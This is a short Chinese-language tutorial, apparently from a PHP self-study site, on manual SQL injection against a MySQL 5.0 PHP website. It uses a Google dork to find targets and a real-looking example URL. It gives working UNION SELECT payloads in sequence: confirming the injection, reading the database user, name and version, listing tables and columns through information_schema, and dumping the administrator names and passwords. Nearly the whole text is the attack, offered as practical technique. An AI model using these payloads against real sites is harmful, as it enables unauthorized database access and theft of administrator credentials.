我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。
利用工具:google 管中窥豹 使用语句:site:heib0y测试数据 inurl:php 可以找出注入点 首先 语句加’
http://HdhCmsTest2cto测试数据 /products/shop.php?c=misc&id=8′
报错
and 1=1 和and 1=2 一个正常一个错误 很明显的注射点
第三步:id=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11–
页面出现数字5和8,
在5的位置使用内置函数user()爆出当前的数据库使用账户
分别使用database(),version()代替5的位置可以爆出数据库名和MYSQL的版本() 5.1.66-community-log
第四步:有了数据库的库名和5.0以上版本信息,我们可以快速爆出所有表名,使用的语法是
php?id=72 and 1=2 union select 1,2,3,4,group_concat(table_name) 6,7,8,9,10,11 from information_schema.tables where table_schema=0x68706F6C
0x68706F6C 这里是数据库的十六进制的编码形式,使用小葵编码一下就行
从中找出敏感表名如admin user admins等等,再爆出管理的字段使用的语句是
php?id=72 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E6973747261746F72 /*此处是表名的十六进制表示*/
我们这里爆出的字段是password和name
最后一步:我们来爆出网站管理员的账号和密码这里是双暴字段方式
使用语句:
and 1=2 UNION SELECT 1,2,3,4,5,6,7,group_concat(name,0x3a,password),9,10,11 from admins
查看更多关于php手工注射MYSQL5.0注入 - 网站安全 - 自学php的详细内容...